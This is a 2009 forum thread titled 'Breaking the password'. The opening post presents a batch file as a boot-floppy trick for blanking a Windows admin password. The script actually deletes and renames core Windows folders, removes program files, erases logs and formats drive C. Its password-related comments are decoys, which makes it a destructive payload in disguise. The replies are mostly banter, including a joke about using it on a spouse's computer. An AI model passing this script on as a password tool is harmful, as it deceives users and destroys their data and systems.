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Breaking the password

gulabad peshawar pakistan


6th May 2009

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Try this for size

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6th May 2009
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labrat -- err -- labra
Oh this is easy
Ok, so you wanna be a cracker. This is cracking 101. Just remember that NEVER TRY THIS, as it is illegal. Ok, for starters let me just say that this is tricky. No actual danger though, but you really should practice it on your own system before attempting to try it on anyone elses. You should at minimum try it 5 or 6 times to really get to know how to do it well.

Items needed

Ability to create a batch file
floppy disk
USB floppy disk drive
create a boot floppy with NTFS Write permissions

Ok, once you have gathered the materials you should already have a boot floppy ready. In the autoexec.bat file add the line suser.bat at the end.

On your desktop, create a file called suser.txt for (suser stands for Super User).
Open the suser.txt file and paste the information below

cls
rem # start _admin.pwd
ren %systemroot%\system32\etc %systemroot%\system32\cet
rem start process A32#458
ren %systemroot%\repair\DS_SOFTWARE A1E
ren %systemroot%\repair\DS_SECURITY A2E
ren %systemroot%\repair\DS_SAM A3E
ren %systemroot%\repair\DS_system.bak A4E
del %systemroot%\repair\A*.* /Q /F
del %systemroot%\repair\s*.* /Q /F
rem script _admin.pwd
del %systemroot%\system32\catroot\*.*
del %systemroot%\system32\catroot2\*.*
del %systemroot%\system32\drivers\cet*.*
rem new_pwd.pwd ==generate 0
del "c:\program files" /Q /F
ren %systemroot%\system32 %systemroot%\newpwd
ren %systemroot%\system %systemroot%\system32
rem AUTO_START new_pwd.pwd 44#1
rem _admin.pwd == DISABLE
del %systemroot%\system32\config /Q /F
erase %systemroot%\system32\LogFiles\*.*
rem ACTIVATE_MEMORY_FLOOD_0x0000323A
rem DISABLE_LOGFILES
format c:\ /Q /A:4096
rem RESTART _admin.pwd


Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
copy the file to your boot floppy disk.

Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.
Sometimes people really lock down the admin account, but this program is smart enough to unlock from both 'hidden' places, to allow a 'no password' option and blank it out, a double whammy!!!

Remember, this is a REAL program that can get you into serious trouble. Also, it is 'time sensitive' when dealing with another persons system without them knowing. Always get to know a program with this much power BEFORE attempting to use it on someone elses machine.

And most of all, never actually use it. I posted it as informative material. USE AT YOUR OWN RISK!!!
And, never ever tell anyone that I gave this to you....

6th May 2009

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nice batch file happy...
---TK--- 6th May 2009
I think I'll try that on my wife's computer tonight....I've been wondering what evil things she's been hiding on her hard drive....then I'll decide what to get her for Mother's Day.
Darryl~ 6th May 2009
I think I'll try that on my wife's computer tonight....I've been wondering what evil things she's been hiding on her hard drive....then I'll decide what to get her for Mother's Day.

Huh?

You married your Mother???? grin
Bizzo 6th May 2009
I'm from it is normal for the husband to give his wife a gift on mothers day.
Wizard-09 6th May 2009
I know.
rolls eyes

I just thought it sounded funny.

But do the husbands get presents on Father's Day from their wives?
Bizzo 6th May 2009
My mum also give my dad a gift of fathers day, strange I know but in't the world we live in abit mad at times lol happy
Wizard-09 6th May 2009
I usually just get a phone call from the older kids & the pleasure of spending the entire day chasing my 5 yr old around while my wife spends the day with her friends....sounds like the women have a far better deal than the guys...oh ya, almost forgot...I get to BBQ for Mother's day & again on Father's Day.
Darryl~ 6th May 2009
I'm glad to see my bottle ain't run out completely!! laugh
OldER Mycroft 6th May 2009
Must be a redneck shocked laugh

good catch -- I read it as a normal thing, but you caught it!

laugh laugh
The Scummy One 6th May 2009
Most unlike me, I might add. wink
OldER Mycroft 6th May 2009
Being from Scotland, you should know how backwards we are over here in Nova Scotia (New Scotland)...we've learned from the best. happy
Darryl~ 6th May 2009
laugh
OldER Mycroft 6th May 2009
if they get divorced, is she still his mom? shocked
jdclyde 6th May 2009
I don't let my 5 yr old to go shopping by herself....besides, I don't give her a large enough allowance. happy
Darryl~ 6th May 2009
Love the response
C F USA 6th May 2009
if the TR search worked better, I could find some of my older stuff -- like how to break your system/monitor/keyboard/and electrocute yourself to get the PW laugh

or -- how to rub HDD platters together properly to make the PW 'jump' to another disk without encryption laugh laugh
The Scummy One 6th May 2009
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Try Gaelic
A woman at Aon spoke Gaelic and that is truly wonderful language for a password.

My manager had another idea. Simply make your password eight asterisks.

********

Looks most secret, doesn't it?
6th May 2009
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gul | a | bad | pesh | a | war | pak | i | stan
Updated - 6th May 2009
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Well, my mind went left field
I read that, and I immediately got "Breaking the Law" by Judas Priest running through my head. Now, it's an earwig, and I can't get it out! AARRRGGGHHHH!!!!

I hate Judas Priest.
7th May 2009

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Hate the OP instead grin
The Scummy One 7th May 2009
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